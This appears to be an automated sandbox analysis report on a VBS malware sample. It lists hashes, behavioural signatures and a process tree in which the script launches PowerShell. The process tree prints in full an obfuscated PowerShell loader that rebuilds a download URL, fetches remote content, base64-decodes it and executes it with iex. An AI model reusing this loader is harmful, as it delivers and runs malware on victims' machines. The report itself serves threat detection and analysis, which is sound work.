Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
12/06/2024, 15:10
Static task
static1
Behavioral task
behavioral1
Sample
1288891badfcf62c7ea6322572451016a77cec9407c5e31ad5f6d3563a353859.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
1288891badfcf62c7ea6322572451016a77cec9407c5e31ad5f6d3563a353859.vbs
Resource
win10v2004-20240508-en
General
-
Target
1288891badfcf62c7ea6322572451016a77cec9407c5e31ad5f6d3563a353859.vbs
-
Size
132KB
-
MD5
77818ebbfbaed2bcdf22c0132e7ab103
-
SHA1
1c863ef727d3d363de06909c1eab3d3206a45f91
-
SHA256
1288891badfcf62c7ea6322572451016a77cec9407c5e31ad5f6d3563a353859
-
SHA512
15fa46e9ac136559638731e2257a847fc4aca1e86d2db29465357e6ec54f820a5b9da7dc2749d1a8fc283435ae51b9cdc655fc9ae3e8a83a03422972b1e59b3f
-
SSDEEP
3072:fwuzkYMPZJqaVBsPHFBktYkCeJ+URvMP/Rj5mk36VYK4qhU4IsMMBlKcUWLZ:f7kYMPZoaVBsPHFBqYkR+URkP/Rj5mjN
Malware Config
Signatures
-
Blocklisted process makes network request 62 IoCs
flow pid Process 6 2672 powershell.exe 7 2672 powershell.exe 8 2672 powershell.exe 9 2672 powershell.exe 10 2672 powershell.exe 11 2672 powershell.exe 12 2672 powershell.exe 13 2672 powershell.exe 14 2672 powershell.exe 15 2672 powershell.exe 16 2672 powershell.exe 17 2672 powershell.exe 18 2672 powershell.exe 19 2672 powershell.exe 20 2672 powershell.exe 21 2672 powershell.exe 22 2672 powershell.exe 23 2672 powershell.exe 24 2672 powershell.exe 25 2672 powershell.exe 26 2672 powershell.exe 27 2672 powershell.exe 28 2672 powershell.exe 29 2672 powershell.exe 30 2672 powershell.exe 31 2672 powershell.exe 32 2672 powershell.exe 33 2672 powershell.exe 34 2672 powershell.exe 35 2672 powershell.exe 36 2672 powershell.exe 37 2672 powershell.exe 38 2672 powershell.exe 39 2672 powershell.exe 40 2672 powershell.exe 41 2672 powershell.exe 42 2672 powershell.exe 43 2672 powershell.exe 44 2672 powershell.exe 45 2672 powershell.exe 46 2672 powershell.exe 47 2672 powershell.exe 48 2672 powershell.exe 49 2672 powershell.exe 50 2672 powershell.exe 51 2672 powershell.exe 52 2672 powershell.exe 53 2672 powershell.exe 54 2672 powershell.exe 55 2672 powershell.exe 56 2672 powershell.exe 57 2672 powershell.exe 58 2672 powershell.exe 59 2672 powershell.exe 60 2672 powershell.exe 61 2672 powershell.exe 62 2672 powershell.exe 63 2672 powershell.exe 64 2672 powershell.exe 65 2672 powershell.exe 66 2672 powershell.exe 67 2672 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 1716 ping.exe 3036 ping.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2672 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2672 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2032 wrote to memory of 1716 2032 WScript.exe 28 PID 2032 wrote to memory of 1716 2032 WScript.exe 28 PID 2032 wrote to memory of 1716 2032 WScript.exe 28 PID 2032 wrote to memory of 3036 2032 WScript.exe 30 PID 2032 wrote to memory of 3036 2032 WScript.exe 30 PID 2032 wrote to memory of 3036 2032 WScript.exe 30 PID 2032 wrote to memory of 2288 2032 WScript.exe 32 PID 2032 wrote to memory of 2288 2032 WScript.exe 32 PID 2032 wrote to memory of 2288 2032 WScript.exe 32 PID 2032 wrote to memory of 2672 2032 WScript.exe 34 PID 2032 wrote to memory of 2672 2032 WScript.exe 34 PID 2032 wrote to memory of 2672 2032 WScript.exe 34 PID 2672 wrote to memory of 2844 2672 powershell.exe 36 PID 2672 wrote to memory of 2844 2672 powershell.exe 36 PID 2672 wrote to memory of 2844 2672 powershell.exe 36
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1288891badfcf62c7ea6322572451016a77cec9407c5e31ad5f6d3563a353859.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\System32\ping.exeping google.com -n 12⤵
- Runs ping.exe
PID:1716
-
-
C:\Windows\System32\ping.exeping %.%.%.%2⤵
- Runs ping.exe
PID:3036
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir2⤵PID:2288
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$badehuset = 1;Function Tontiner($Pujas206){$Thoroughness=$Pujas206.Length-$badehuset;$Projektidxd114='Substring';For( $Mindetavlen252=5;$Mindetavlen252 -lt $Thoroughness;$Mindetavlen252+=6){$Slingers+=$Pujas206.$Projektidxd114.Invoke( $Mindetavlen252, $badehuset);}$Slingers;}function footbridges($Skattekorts){ . ($Revises) ($Skattekorts);}$Quinonic=Tontiner 'tagetM,stopoTambozNo.coi.endslHotsplDi.agaSp,nn/Repro5Carlo.Solol0 Flns Holdu(N nmeWDatofi ilymnsh.mmdRigsmoCunylwSlipks.emon RepiNAngelT U bo Berne1Sknke0Henb,.Raket0Court;Danne InsisWOktaliBivaanUnd.r6 Qual4Mortu;Gra m SikkxEroti6.rflj4Pol.e;Overc .upprBroadvSrhft:Bager1Nonsu2Retro1 Cont. G,lf0Films) Fera Non.eGLeptoe Hovec F nekUltraoSt,di/endo 2Ti.sm0 Loya1delre0Sulph0 ,usi1D.spo0rutt.1P sid PhotoFLaspriSmlderBromyeFamilfziggioSayabxSudat/Irela1Mesna2 Deon1Patr...koda0Audin ';$Personregisterets=Tontiner 'PomegUpluvisI,tereHo rorHyper-sjleaA Teo,gundese SandnH.rtytBlo,p ';$Fishwood=Tontiner 'Mi.eyhPantetIngvatAarenpPusslsDe.ar:Pen.i/H.lic/,remkwTriksw GarrwVrtsh. E,feaPropatOdocoo GuldramplidSchiseFalc gLomba.T,melcPalsyo EmblmFring.TronsbWithirdolph/Sa,meU Din,pAbefehUn.ero SkilaRegarrHelnodP,radiSprotnBssesgSejlk. Cow,h t.eshLifelpColum ';$counterintelligence=Tontiner 'Sam,e>Exo,r ';$Revises=Tontiner ',indeiTagdkeOutblxkvajp ';$Maldiverne='Pedeller';$supertranscendentness = Tontiner 'Inspie.epyscCackehOpsigoHecto Fimbr%Japhea ClaupSov,hp torhdcomplaPrim.tAttraa Pass% rees\vernoD,enfdiSminto Mul.m.capueMrknidReconeSkiftsFavou. atalMTranqeO.kalt Bagt Snows&resti& Velk BuddieDixiecHuyghh TovroTegns edit elv ';footbridges (Tontiner ' stm$B rdegMuckilFj rto Salvb embrafemdolAfmel:GrundARundscAfrivhBenztiFarten C,areLet,rs.nganeH.rti=Submo(RetskcSk,rlmAvlstdporte S.mit/Udlsec Neds F lia$Sil csNih,luTurbopAmpuleBrepirRadiot otalrBefataM,bilnGeo gsAc,accSubsteDis,anExterdRef reFlappn Atl.tJustinAdteve Tkk,s Frigs.dels)Peni, ');footbridges (Tontiner 'kines$pe.ocg.dvarlM skio,icrob UltraDoughlSulph:ForurLNvnspa teruEmielgTudsehThr.nipul cnMavengeffeksLumb.=Woozl$RekorFPigmeiSh,iksLion.hInverwChrisoBiennoSeq.adSubal.Skil sRressp Indkl Bla iFrkentPo os(Hepca$UdvikcPaedeoStoppuOliernfo,nttPr,queWa.slr Urugiudst n M,cht ,ilbeDosmelDe.idlFortliHalslg Un.oeKons.nsnigvcZarereBarra)Moles ');$Fishwood=$Laughings[0];$Scrotocele= (Tontiner 'Discr$ferskgPreorlUncisokathab AeroaSalutl,elta:OpvarD ,omiiDr,kmg ,npatBlgeteAnticrU dervFo earBr.shkSnitteTrstetTwa ksImpot= To hNPiiabeN.stiw Iva.-Skot,Opoly,bHorrijTebreeSkuffcpli,stSkarp OctahSsho.ey sekss M,rrtSter.ePyro.mBrnds. elonNUdra,eDi.kntFatti. UndeWNud,leCrowsb ShadC TelelLasari Bry.eSplennRevist');$Scrotocele+=$Achinese[1];footbridges ($Scrotocele);footbridges (Tontiner 'Potcr$Du.frD ulvei pidng jordtVind,e rratrDematvFloutr Svankuncohe UnsttEft.rs .ibb.AndroHStrene FebraSvagsdClosee.ierorGlobasAncyl[,rgen$UnworPIn,pieSpa,crsa.chsUn eroUdha,nS,ondrPerr.eFortag CycliAmendsNissetGeneseStolerStilkeAppritUnforsMower] Para=Swish$RelenQEf.eruKlodsiAgarwnParanoFedt nUnderi th.ecRebu, ');$Biloculina=Tontiner ',etta$FaresDPsychiTil agBurg.tPleureSieror,roduvMicror DirikHavareFlkkst ,ecosNonle. RustDAr,afoIndexwSkrebnF rtflBluebo MissaRdkrid PhotF.iramiUncralPortheKe me(clegg$EnergFColliiAkties Prophsto hwSkraaoSt kno.ermidBenme,Lexic$ J.veAS.rmulOvisiiKyo,dyPolonaNu,anhrumne)Fortr ';$Aliyah=$Achinese[0];footbridges (Tontiner 'B.rtv$RechugSmreolU kreoByggebD.leva EqualSamme:OpsluSB,shatJerimeRegendLyksah Sp,oo MalerScorbsWarileSkiftsGodtg=Valgb(Mo,saTMhedeeDownpsCathatStint- poliPStortaPeript UndehUdva, Subra$EgetrABeciflCampiiInaccy SystaSva,eh S,pr)Ne to ');while (!$Stedhorses) {footbridges (Tontiner ' .ile$Opposga omalEnvisoOpl ibBylanaTe eglbogst:frid.T,errueVaabesB,kletAs ondMi era onotPep,oaForefsreceptUnove=Tilve$fribrt E,ucr M touSkorteAlmue ') ;footbridges $Biloculina;footbridges (Tontiner ' Art S galetUnthiaVi,gurlobsttNonde-So,tySIdiomlIntere BarbeDokkepNonda sympt4 Udbl ');footbridges (Tontiner ' Rele$ llomgDena l nkoo .pstbSkovma InvalLser,:QuotiSTescht FaneeJuleedImpl,hSatsboParafrAc essSwa.geTve psCori = Dor,(ArgenT Gglee Bo.bsDechitAdenf- l mmPNaturaUtinatDecemh Foru Prere$GymnaAB medlSayabiMaveryOver,aFannehButik)methy ') ;footbridges (Tontiner ' Osti$fecu gPeraglHvaeloIndolb millaNontalVanva:,uperPTreelrL,rici For,oTanderAs.etiDubbet,orhaespaadtValgbsUvilkh.njouaTo.tovnas.iest,kvrPar veRistesArina=Biote$ ProrgGu,sblBil coBedr.b Hunda horilAuxes:MullsAGodkefMumhotHumusvAffaltSk ort Solhe ReinlBellis Tal.eFuld,rTempenPrenieTu nd+print+Sorte% Pitc$GoldfL erreaSlynguTenemgT asshPr tfiStamfnPres.g,xtras,orde.HalvbcP gmsoUnox,uCentenTotidtDagli ') ;$Fishwood=$Laughings[$Prioritetshaveres];}$Fantasteriers79=344305;$stjernetydere=28583;footbridges (Tontiner 'Fej p$Nondog MdealCoaguoTosprbAntr aLangvlFockl:Lo.dsPHurlsr,ammeo Uds tTo reeInexprNeutrvKodeliEq.iltFortry kons hazza=Afh.t TrophGReinceStorktPelar-SkimmCSph.ro .oksnIrv,nt .raneDavennBajett Faam Messi$ oma,A Ubbel,hirti ProvyPostmaA.ernhRa.pe ');footbridges (Tontiner ' G.ns$Al,ohgSupral C,enoAvi.sbTropeaunlizlStvfr:StonaUJammenKardic SlesoTittinS xtifYel,eiMarg.nUnbrae F agd Pestl BlesyRu.ri Luxa.=Out.i Dow.[Tr dvSNednoy Prias.egirtCranieMisremAfd l.inte.CElemeoRed,en N vev DigeeSoie.rFilostAr.it]Repub:Boje.:AlnatFPrmierN tiooPageamHecatBDecoraScribsOmnifeBerid6sophi4GartnSPergatBarderEmbariApomenUno,igOpist(Odiou$TilflPKrakerTiosuosubsitPhotoeSka.trFolktv,orsfihariat Rou,yVerde)Menne ');footbridges (Tontiner 'Syrne$GaskrgFags lUnquao .ageb Bal,aLykkelfarts: R.apFDehuma Te,mr,ochoeBemintMul,irNomaduTr cteVedhnnNatted plamekleptsFrake1Pleje6S tte1Sving Ou.gr=Besid Atom[KronrSN,deryJ.nglsCathotSstvleHjortm ,opl.UnconTBeskyeForlnxquadrtPha.t. Her EPibalnFej,lcPhoebo orddLovlyi,ambunMars g O.ts].kraa:De.ug: Ol.nACentrSAbonnCpiebaI FordIUforg.Ser.oGRafleeGespetSu asSA,falt .jerrHoverimumpenSpoong ilei(therm$TrochUSuckunRokkecLaroioEmnean,olsjfKneppiGrnthnYomereBlunkdFornol SkruyDefin)Vanre ');footbridges (Tontiner 'modal$Knowhgta.etlDeem,oTerutbUnestaFyrbdlKant :desanOOrdinvN,tteeru isr arsfPlantoTabagrDysfamthoroyBesrgnUnresdRig.ie,atterSpgel1Aften6Cavea3 Gens=Trret$ LysrFenddaaRadbrr,lcedeZaport SverrSemimuNature Til nKortld Raine DepasStift1Molap6Vindi1Rhizo.Ildsls ArcauSprgebBill.sPilf tSa mer PrakiCaymanAppregbasep( Emod$BondeFS.iffaGrisonSkuldtUnex.a Paa sBerlitSkib.e.olkerbnderi Pla.eBlephrRegros tork7Hygum9E.spe,Opspr$preobsUdsg.tLoyrejSidsteBeto.r AutonLigese de.otOvertyAdresdResp,eGr,ahr Antie.eods)craju ');footbridges $Overformynder163;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Diomedes.Met && echo t"3⤵PID:2844
-
-